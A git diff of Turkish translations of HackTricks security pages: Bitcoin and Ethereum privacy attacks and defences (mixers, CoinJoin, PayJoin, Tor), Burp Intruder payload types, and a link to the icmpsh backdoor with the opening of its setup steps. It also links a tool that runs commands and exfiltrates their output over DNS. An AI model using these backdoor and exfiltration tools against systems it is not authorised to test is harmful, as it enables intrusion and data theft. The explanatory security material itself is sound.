- **DEX** ve **DAO'lar**, sırasıyla Merkezi Olmayan Borsa Platformları ve Merkezi Olmayan Otonom Organizasyonlar anlamına gelir.
- **Akıllı Sözleşmeler** belirli koşullar karşılandığında bir blok zincirinde yürütülen programlar olarak tanımlanır, aracısız anlaşma yürütmeyi otomatikleştirir.
- **Merkeziyetsiz Uygulamalar (dApps)** akıllı sözleşmelere dayanarak, kullanıcı dostu bir ön uç ve şeffaf, denetlenebilir bir arka uç sunar.
- **Token'lar ve Coin'ler** coin'lerin dijital para olarak hizmet ettiği, token'ların ise belirli bağlamlarda değer veya sahiplik temsil ettiği ayrımı yapar.
- **Fayda Token'ları** hizmetlere erişim sağlarken, **Güvenlik Token'ları** varlık sahipliğini belirtir.
- **DeFi**, merkezi otoriteler olmadan finansal hizmetler sunan Decentralized Finance'ı temsil eder.
- **DEX** ve **DAO'lar** sırasıyla Merkeziyetsiz Borsa Platformları ve Merkeziyetsiz Özerk Organizasyonları ifade eder.
## Uzlaşma Mekanizmaları
## Konsensüs Mekanizmaları
Uzlaşma mekanizmaları, blok zincirinde güvenli ve kabul edilen işlem doğrulamalarını sağlar:
- **Proof of Work (PoW)**, işlem doğrulaması için hesaplama gücüne dayanır.
- **Proof of Stake (PoS)**, doğrulayıcıların belirli miktarda token tutmasını gerektirir ve PoW'a kıyasla enerji tüketimini azaltır.
Konsensüs mekanizmaları, blok zincirinde güvenli ve kabul edilmiş işlem doğrulamalarını sağlar:
- **Proof of Work (PoW)** işlem doğrulaması için hesaplama gücüne dayanır.
- **Proof of Stake (PoS)** doğrulayıcıların belirli miktarda token'a sahip olmalarını gerektirir, PoW'a göre enerji tüketimini azaltır.
## Bitcoin Temelleri
### İşlemler
Bitcoin işlemleri, adresler arasında fon transferini içerir. İşlemler dijital imzalar aracılığıyla doğrulanır ve yalnızca özel anahtar sahibi transferleri başlatabilir.
Bitcoin işlemleri adresler arasında fon transferini içerir. İşlemler dijital imzalar aracılığıyla doğrulanır, yalnızca özel anahtar sahibinin transferleri başlatabileceğini sağlar.
#### Ana Bileşenler:
- **Çoklu İmza İşlemleri**, bir işlemi yetkilendirmek için birden fazla imza gerektirir.
- İşlemler, **girişler** (fon kaynağı), **çıkışlar** (hedef), **ücretler** (madencilere ödenir) ve **scriptler** (işlem kuralları)den oluşur.
- **Çoklu İmza İşlemleri** bir işlemi yetkilendirmek için birden fazla imza gerektirir.
- İşlemler **girişler** (fon kaynağı), **çıkışlar** (hedef), **ücretler** (madencilere ödenir) ve **scriptler** (işlem kuralları) içerir.
### Lightning ı
### Lightning Network
Birden fazla işlemi bir kanal içinde gerçekleştirerek Bitcoin'in ölçeklenebilirliğini artırmayı amaçlar ve yalnızca son durumu blok zincirine yayınlar.
Birden fazla işlemi bir kanal içinde gerçekleştirerek Bitcoin'in ölçeklenebilirliğini artırmayı amaçlar, sadece son durumu blok zincirine yayınlar.
## Bitcoin Gizlilik Endişeleri
**Ortak Giriş Sahipliği** ve **UTXO Değişim Adresi Tespiti** gibi gizlilik saldırıları, işlem desenlerini sömürür. **Karıştırıcılar** ve **CoinJoin** gibi stratejiler, kullanıcılar arasındaki işlem bağlantılarını belirsizleştirerek anonimliği artırır.
**Ortak Giriş Sahipliği** ve **UTXO Değişim Adresi Tespiti** gibi gizlilik saldırıları, işlem desenlerini sömürür. **Karıştırıcılar** ve **CoinJoin** gibi stratejiler, kullanıcılar arasındaki işlem bağlantılarını belirsizleştirerek gizliliği artırır.
## Anonim Olarak Bitcoin Edinme
Yöntemler arasında nakit işlemler, madencilik ve karıştırıcı kullanımı bulunur. **CoinJoin**, izlenebilirliği karmaşıklaştırmak için birden fazla işlemi karıştırırken, **PayJoin**, gizlilik düzeyini artırmak için CoinJoin'leri normal işlemler gibi gösterir.
Yöntemler arasında nakit işlemler, madencilik ve karıştırıcı kullanımı bulunur. **CoinJoin**, izlenebilirliği karmaşıklaştırmak için birden fazla işlemi karıştırırken, **PayJoin** gizliliği artırmak için CoinJoin'leri normal işlemler gibi gösterir.
# Bitcoin Gizlilik Saldırıları
# Bitcoin Gizlilik Saldırılarının Özeti
Bitcoin dünyasında, işlemlerin gizliliği ve kullanıcıların anonimliği genellikle endişe konularıdır. İşte saldırganların Bitcoin gizliliğini tehlikeye atabileceği birkaç yaygın yöntemin basitleştirilmiş bir genel bakışı.
Bitcoin dünyasında işlemlerin gizliliği ve kullanıcıların anonimliği genellikle endişe konularıdır. İşte saldırganların Bitcoin gizliliğini tehlikeye atabileceği birkaç yaygın yöntemin basitleştirilmiş bir genel bakışı.
## **Ortak Giriş Sahipliği Varsayımı**
Farklı kullanıcılara ait girişlerin tek bir işlemde birleştirilmesi genellikle karmaşık olduğu için nadirdir. Bu nedenle, **aynı işlemdeki iki giriş adresinin genellikle aynı sahibe ait olduğu varsayılır**.
Farklı kullanıcılara ait girişlerin genellikle aynı işlemde birleştirilmesi nadirdir, bu nedenle **aynı işlemdeki iki giriş adresinin genellikle aynı sahibe ait olduğu varsayılır**.
## **UTXO Değişim Adresi Tespiti**
Bir UTXO veya **Harcanmamış İşlem Çıktısı**, bir işlemde tamamen harcanmalıdır. Eğer sadece bir kısmı başka bir adrese gönderilirse, geri kalanı yeni bir değişim adresine gider. Gözlemciler, bu yeni adresin gönderene ait olduğunu varsayabilir ve gizliliği tehlikeye atabilir.
Bir UTXO veya **Harcanmamış İşlem Çıktısı**, bir işlemde tamamen harcanmalıdır. Eğer sadece bir kısmı başka bir adrese gönderilirse, kalan kısım yeni bir değişim adresine gider. Gözlemciler, bu yeni adresin gönderene ait olduğunu varsayabilir, gizliliği tehlikeye atar.
### Örnek
Bu durumu hafifletmek için karıştırma hizmetleri veya birden fazla adres kullanmak, sahipliği belirsizleştirmeye yardımcı olabilir.
Bu durumu hafifletmek için karıştırma hizmetleri veya birden fazla adres kullanımı sahipliği belirsizleştirebilir.
## **Sosyal Ağlar ve Forumlarla İlgili Bilgilerin Ortaya Çıkması**
## **Sosyal Ağlar ve Forumlar Maruziyeti**
Kullanıcılar bazen Bitcoin adreslerini çevrimiçi paylaşır, bu da adresi sahibiyle ilişkilendirmeyi **kolaylaştırır**.
Kullanıcılar bazen Bitcoin adreslerini çevrimiçi paylaşırlar, bu da adresi sahibiyle **ilişkilendirmeyi kolaylaştırır**.
## **İşlem Grafiği Analizi**
İşlemler grafikler halinde görselleştirilebilir ve fon akışına dayanarak kullanıcılar arasında potansiyel bağlantıları ortaya çıkarabilir.
İşlemler grafikler halinde görselleştirilebilir, fon akışına dayalı olarak kullanıcılar arasındaki potansiyel bağlantıları ortaya çıkarabilir.
## **Gereksiz Giriş Heuristiği (Optimal Değişim Heuristiği)**
Bu heuristik, birden fazla giriş ve çıkışa sahip işlemleri analiz ederek değişimi gönderene dönen çıktının hangisi olduğunu tahmin etmeye dayanır.
Bu heuristik, birden fazla giriş ve çıkış içeren işlemleri analiz ederek değişim olarak gönderilen çıktının gönderene geri dönen değişim olduğunu tahmin etmeye dayanır.
### Örnek
```bash
2 btc --> 4 btc
3 btc 1 btc
```
## **Zorunlu Adres Kullanımı**
## **Zorunlu Adres Tekrarı**
Saldırganlar, daha önce kullanılan adreslere küçük miktarlarda gönderim yapabilir ve umut ederler ki alıcı, bu miktarları gelecekteki işlemlerde diğer girdilerle birleştirerek adresleri birbirine bağlar.
Saldırganlar, önceki kullanılmış adreslere küçük miktarlar gönderebilir ve umut eder ki alıcı, gelecekteki işlemlerde bu miktarları diğer girdilerle birleştirerek adresleri birbirine bağlar.
### Doğru Cüzdan Davranışı
Bu gizlilik sızıntısını önlemek için cüzdanlar, zaten kullanılmış boş adreslere gelen paraları kullanmamalıdır.
Bu gizlilik sızıntısını önlemek için cüzdanlar, zaten kullanılmış boş adreslere gelen paraları kullanmaktan kaçınmalıdır.
## **Diğer Blockchain Analiz Teknikleri**
- **Tam Ödeme Miktarları:** Değişiklik olmadan gerçekleşen işlemler, muhtemelen aynı kullanıcıya ait iki adres arasında gerçekleşir.
- **Yuvarlak Sayılar:** Bir işlemdeki yuvarlak bir sayı, bir ödeme olduğunu gösterir ve yuvarlanmayan çıktı muhtemelen değişikliktir.
- **Cüzdan Parmak İzi:** Farklı cüzdanlar benzersiz işlem oluşturma desenlerine sahiptir, bu da analistlerin kullanılan yazılımı ve potansiyel olarak değişiklik adresini belirlemelerine olanak sağlar.
- **Tam Ödeme Miktarları:** Değişiklik olmadan yapılan işlemler muhtemelen aynı kullanıcıya ait iki adres arasında gerçekleşir.
- **Yuvarlanmış Sayılar:** Bir işlemdeki yuvarlanmış bir sayı, muhtemelen bir ödeme olduğunu gösterir, yuvarlanmamış çıktının değişiklik olduğu olasıdır.
- **Cüzdan Parmak İzi:** Farklı cüzdanlar benzersiz işlem oluşturma desenlerine sahiptir, analistlerin kullanılan yazılımı ve potansiyel olarak değişiklik adresini belirlemesine olanak tanır.
- **Miktar ve Zaman Korelasyonları:** İşlem zamanlarını veya miktarlarınııklamak, işlemlerin izlenebilir olmasına neden olabilir.
## **Trafik Analizi**
Ağ trafiğini izleyerek saldırganlar, kullanıcı gizliliğini tehlikeye atarak işlemleri veya blokları IP adresleriyle ilişkilendirebilirler. Bu özellikle bir kuruluşun birçok Bitcoin düğümü işletmesi durumunda geçerlidir, çünkü bu durumda işlemleri izleme yetenekleri artar.
Ağ trafiğini izleyerek, saldırganlar potansiyel olarak işlemleri veya blokları IP adresleriyle ilişkilendirebilir ve kullanıcı gizliliğini tehlikeye atabilir. Bu özellikle bir varlık çok sayıda Bitcoin düğümü işletiyorsa ve bu sayede işlemleri izleme yeteneklerini artırıyorsa geçerlidir.
## Daha Fazlası
Gizlilik saldırıları ve savunmaları için kapsamlı bir liste için [Bitcoin Wiki'deki Bitcoin Gizliliği](https://en.bitcoin.it/wiki/Privacy) sayfasını ziyaret edin.
@ -110,75 +111,75 @@ Gizlilik saldırıları ve savunmaları için kapsamlı bir liste için [Bitcoin
# Anonim Bitcoin İşlemleri
## Bitcoins'i Anonim Olarak Nasıl Elde Edilir
## Bitcoins Anonim Bir Şekilde Nasıl Alınır
- **Nakit İşlemler**: Nakit aracılığıyla bitcoin edinme.
- **Nakit İşlemler**: Bitcoin edinme işlemi nakit para ile yapılır.
- **Nakit Alternatifleri**: Hediye kartları satın almak ve bunları çevrimiçi olarak bitcoin'e dönüştürmek.
- **Madencilik**: Bitcoin kazanmanın en gizli yöntemi madencilik yapmaktır, özellikle yalnız yapıldığında, çünkü madencilik havuzları madencinin IP adresini bilebilir. [Madencilik Havuzları Bilgisi](https://en.bitcoin.it/wiki/Pooled_mining)
- **Hırsızlık**: Teorik olarak, bitcoin çalmak başka bir yöntem olabilir, ancak bu yasa dışıdır ve önerilmez.
- **Madencilik**: Bitcoin kazanmanın en gizli yolu madencilik yapmaktır, özellikle yalnız yapıldığında, çünkü madencilik havuzları madencinin IP adresini bilebilir. [Madencilik Havuzları Bilgisi](https://en.bitcoin.it/wiki/Pooled_mining)
- **Hırsızlık**: Teorik olarak, bitcoin çalmak başka bir anonim edinme yöntemi olabilir, ancak yasa dışıdır ve önerilmez.
## Karıştırma Hizmetleri
Bir karıştırma hizmeti kullanarak bir kullanıcı, **bitcoin gönderebilir** ve **farklı bitcoinler alabilir**, bu da orijinal sahibini izlemeyi zorlaştırır. Bununla birlikte, bu, hizmetin günlükleri tutmamasına ve gerçekten bitcoinleri geri vermesine güven gerektirir. Alternatif karıştırma seçenekleri arasında Bitcoin casinoları bulunur.
Karıştırma hizmeti kullanarak bir kullanıcı **bitcoin gönderebilir** ve **farklı bitcoinler alabilir**, bu da orijinal sahibini izlemeyi zorlaştırır. Ancak, bu, hizmetin günlük tutmamasına ve gerçekten bitcoinleri geri vermesine güven gerektirir. Alternatif karıştırma seçenekleri arasında Bitcoin casinoları bulunmaktadır.
## CoinJoin
**CoinJoin**, farklı kullanıcıların birden fazla işlemini birleştirerek girişleri çıktılarla eşleştirmeye çalışan herhangi bir kişinin işlemi karmaşıklaştırır. Etkili olmasına rağmen, benzersiz giriş ve çıkış boyutlarına sahip işlemler hala izlenebilir olabilir.
**CoinJoin**, farklı kullanıcılardan gelen birden fazla işlemi birleştirerek, girdileri çıktılarla eşleştirmeye çalışan herkesin işini zorlaştırır. Etkili olmasına rağmen, benzersiz girdi ve çıktı boyutlarına sahip işlemler potansiyel olarak hala izlenebilir olabilir.
CoinJoin kullanılmış olabilecek örnek işlemler şunları içerir: `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` ve `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
CoinJoin'i kullandığı düşünülen örnek işlemler şunları içerebilir: `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` ve `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
Daha fazla bilgi için [CoinJoin](https://coinjoin.io/en) sayfasını ziyaret edin. Ethereum için benzer bir hizmet için [Tornado Cash](https://tornado.cash) adresine göz atın, bu hizmet madencilerin fonlarıyla işlemleri anonimleştirir.
Daha fazla bilgi için [CoinJoin](https://coinjoin.io/en) sayfasını ziyaret edin. Ethereum'da benzer bir hizmet için [Tornado Cash](https://tornado.cash) sayfasına göz atabilirsiniz, bu hizmet, madencilerden gelen fonlarla işlemleri anonimleştirir.
## PayJoin
CoinJoin'in bir türevi olan **PayJoin** (veya P2EP), iki taraf arasındaki (örneğin, bir müşteri ve bir satıcı) işlemi, CoinJoin'in karakteristik eşit çıktıları olmadan normal bir işlem gibi gizler. Bu, tespit etmesi son derece zorlaştırır ve işlem gözetim kuruluşları tarafından kullanılan ortak-giriş-sahipliği heuristiğini geçersiz kılabilir.
CoinJoin'in bir türevi olan **PayJoin** (veya P2EP), işlemi iki taraf arasında (örneğin, bir müşteri ve bir satıcı) düzenli bir işlem gibi gizler, CoinJoin'in karakteristik eşit çıktıları olmadan. Bu, tespit etmeyi son derece zorlaştırır ve işlem gözetleme kuruluşları tarafından kullanılan ortak-girdi-sahipliği sezgisini geçersiz kılabilir.
```plaintext
2 btc --> 3 btc
5 btc 4 btc
```
Yukarıdaki gibi işlemler PayJoin olabilir ve standart bitcoin işlemlerinden ayırt edilemeyerek gizliliği artırabilir.
Yukarıdaki gibi işlemler PayJoin olabilir, standart bitcoin işlemlerinden ayırt edilemeyen bir şekilde gizliliği artırır.
**PayJoin kullanımı, geleneksel gözetim yöntemlerini önemli ölçüde bozabilir**, bu da işlem gizliliği arayışında umut verici bir gelişme olarak kabul edilir.
**PayJoin'un kullanımı geleneksel gözetim yöntemlerini önemli ölçüde bozabilir**, bu da işlem gizliliğinin peşinde umut verici bir gelişmedir.
# Kripto Paralarda Gizlilik için En İyi Uygulamalar
## **Cüzdan Senkronizasyon Teknikleri**
Gizliliği ve güvenliği korumak için cüzdanları blok zinciriyle senkronize etmek önemlidir. İki yöntem öne çıkar:
Gizliliği ve güvenliği korumak için cüzdanları blok zinciri ile senkronize etmek önemlidir. İki yöntem öne çıkar:
- **Tam düğüm**: Tüm blok zincirini indirerek tam bir düğüm, maksimum gizlilik sağlar. Yapılan tüm işlemler yerel olarak depolanır, bu da saldırganların kullanıcının hangi işlemlerle veya adreslerle ilgilendiğini belirlemesini imkansız hale getirir.
- **İstemci tarafı blok filtreleme**: Bu yöntem, blok zincirinde her blok için filtreler oluşturmayı içerir, böylece cüzdanlar kullanıcının ilgili işlemleri belirleyebilir ve özel ilgi alanlarını ağ gözlemcilerine açıklamadan. Hafif cüzdanlar bu filtreleri indirir, kullanıcının adresleriyle eşleşme bulunduğunda yalnızca tam blokları alır.
- **Tam düğüm**: Tüm blok zincirini indirerek tam bir düğüm, maksimum gizliliği sağlar. Yapılan tüm işlemler yerel olarak depolanır, bu da düşmanların kullanıcının hangi işlemlere veya adreslere ilgi duyduğunu belirlemesini imkansız hale getirir.
- **İstemci tarafı blok filtreleme**: Bu yöntem, blok zincirinde her blok için filtreler oluşturmayı içerir, bu da cüzdanların belirli ilgi alanlarını ağ gözlemcilerine açığa çıkarmadan belirlemesine olanak tanır. Hafif cüzdanlar bu filtreleri indirir, kullanıcının adresleriyle eşleşme bulunduğunda yalnızca tam blokları alır.
## **Anonimlik için Tor Kullanımı**
Bitcoin'in eşler arası bir ağ üzerinde çalıştığı göz önüne alındığında, ağla etkileşimde bulunurken IP adresinizi gizlemek için Tor kullanmanız önerilir, gizliliği artırır.
Bitcoin'in eşler arası ağ üzerinde çalıştığı göz önüne alındığında, ağ ile etkileşimde bulunurken IP adresinizi gizlemek için Tor kullanmanız önerilir, gizliliği artırır.
## **Adres Tekrarını Önleme**
Gizliliği korumak için her işlem için yeni bir adres kullanmak önemlidir. Adres tekrarı, işlemleri aynı varlıkla ilişkilendirerek gizliliği tehlikeye atabilir. Modern cüzdanlar, tasarımlarıyla adres tekrarını teşvik etmez.
Gizliliği korumak için her işlem için yeni bir adres kullanmak önemlidir. Adreslerin tekrar kullanılması, işlemleri aynı varlıkla ilişkilendirerek gizliliği tehlikeye atabilir. Modern cüzdanlar tasarımlarıyla adres tekrarını önlemeye teşvik eder.
## **İşlem Gizliliği Stratejileri**
- **Birden fazla işlem**: Bir ödemeyi birkaç işleme bölmek, işlem miktarını belirsizleştirerek gizlilik saldırılarını engelleyebilir.
- **Değişiklikten kaçınma**: Değişiklik çıktıları gerektirmeyen işlemleri tercih etmek, değişiklik tespit yöntemlerini bozarak gizliliği artırır.
- **Birden fazla değişiklik çıktısı**: Değişiklikten kaçınmak mümkün olmadığında, birden fazla değişiklik çıktısı oluşturmak yine de gizliliği artırır.
- **Birden fazla işlem**: Bir ödemeyi birkaç işleme bölmek, işlem miktarını belirsizleştirerek gizlilik saldırılarını engeller.
- **Para üstü vermemek**: Para üstü gerektirmeyen işlemleri tercih etmek, para üstü tespit yöntemlerini bozarak gizliliği artırır.
- **Birden fazla para üstü çıktısı**: Para üstü vermemek mümkün değilse, birden fazla para üstü çıktısı oluşturmak yine de gizliliği artırabilir.
# **Monero: Anonimliğin Işığı**
Monero, dijital işlemlerde mutlak anonimliğe ihtiyacı karşılar ve gizlilik için yüksek bir standart belirler.
Monero, dijital işlemlerde mutlak anonimliğe olan ihtiyacı ele alarak gizlilik için yüksek bir standart belirler.
# **Ethereum: Gas ve İşlemler**
# **Ethereum: Gaz ve İşlemler**
## **Gas'ı Anlama**
## **Gazın Anlaşılması**
Gas, Ethereum'da işlemleri gerçekleştirmek için gereken hesaplama çabasını **gwei** cinsinden ölçer. Örneğin, 2.310.000 gwei (veya 0.00231 ETH) maliyeti olan bir işlem, bir gaz limiti ve bir temel ücret içerir ve madencileri teşvik etmek için bir bahşiş içerir. Kullanıcılar, fazla ödeme yapmamak için maksimum ücreti belirleyebilir ve fazlası iade edilir.
Gaz, Ethereum'da işlemleri gerçekleştirmek için gereken hesaplama çabasını ölçer ve **gwei** cinsinden fiyatlandırılır. Örneğin, 2.310.000 gwei (veya 0.00231 ETH) maliyeti olan bir işlem, bir gaz limiti ve bir taban ücret içerir, madencileri teşvik etmek için bir bahşiş içerir. Kullanıcılar fazla ödeme yapmamak için maksimum ücreti ayarlayabilir, fazlası iade edilir.
## **İşlemleri Gerçekleştirme**
## **İşlemlerin Yürütülmesi**
Ethereum'daki işlemler gönderen ve alıcı olmak üzere iki tarafı içerir, bu adresler kullanıcı veya akıllı sözleşme adresleri olabilir. İşlemler bir ücret gerektirir ve madencilik yapılmalıdır. Bir işlemdeki temel bilgiler alıcı, gönderenin imzası, değer, isteğe bağlı veriler, gaz limiti ve ücretleri içerir. Özellikle, gönderenin adresi imzadan türetilir, bu da işlem verilerinde adresin gereksiz olmasını sağlar.
Ethereum'daki işlemler bir gönderici ve bir alıcıyı içerir, bunlar kullanıcı veya akıllı kontrat adresleri olabilir. Bir ücret gerektirir ve madencilik yapılmalıdır. Bir işlemin temel bilgileri alıcı, göndericinin imzası, değer, isteğe bağlı veri, gaz limiti ve ücretleri içerir. Önemli bir nokta olarak, göndericinin adresi imzadan çıkarılarak işlem verilerinde gerekli olmaz.
Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkesin kripto paralarla etkileşime girmek istemesi için temel oluşturur.
Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkesin kripto paralarla etkileşimde bulunmak istemesi için temel niteliktedir.
## Referanslar
@ -189,18 +190,3 @@ Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkesi
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklam vermek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live).
* Hacking hilelerinizi paylaşmak için PR göndererek [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,43 +1,29 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# Temel Payloadlar
* **Basit Liste:** Her satırda bir giriş içeren bir liste
* **Çalışma Zamanı Dosyası:** Bellekte yüklenmeyen bir liste olarak çalışma zamanında okunan bir liste. Büyük listeleri desteklemek için.
* **Durum Değişikliği:** Bir dize listesine bazı değişiklikler uygulayın (Değişiklik yok, küçük harfe dönüştürme, BÜYÜK HARFE dönüştürme, İsim düzgün hale getirme - İlk harf büyük ve geri kalanı küçük-, İsim düzgün hale getirme - İlk harf büyük ve geri kalanı aynı kalır-.
* **Sayılar:** X'ten Y'ye Z adımlarıyla veya rastgele sayılar oluşturun.
* **Çalışma Zamanı Dosyası:** Bellekte yüklenmeyen, çalışma zamanında okunan bir liste. Büyük listeleri desteklemek için.
* **Durum Değişikliği:** Bir dizi dizeye bazı değişiklikler uygulayın (Değişiklik yapma, küçük harfe çevirme, BÜYÜK HARFE ÇEVİRME, Doğru ad - İlk harfi büyük ve geri kalanı küçük-, Doğru Ad -İlk harfi büyük ve geri kalanı aynı kalır-.
* **Sayılar:** X'ten Y'ye Z adımı kullanarak veya rastgele sayılar oluşturun.
* **Brute Forcer:** Karakter seti, min ve max uzunluk.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için kullanılan payload.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Komutları yürütmek ve çıktıyı burpcollab'a DNS istekleri aracılığıyla almak için payload.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -1,25 +1,25 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Backdoor'u şuradan indirin: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
Arka kapıyı şuradan indirin: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# İstemci tarafı
Betik dosyasını çalıştırın: **run.sh**
**Hata alırsanız, aşağıdaki satırları değiştirmeyi deneyin:**
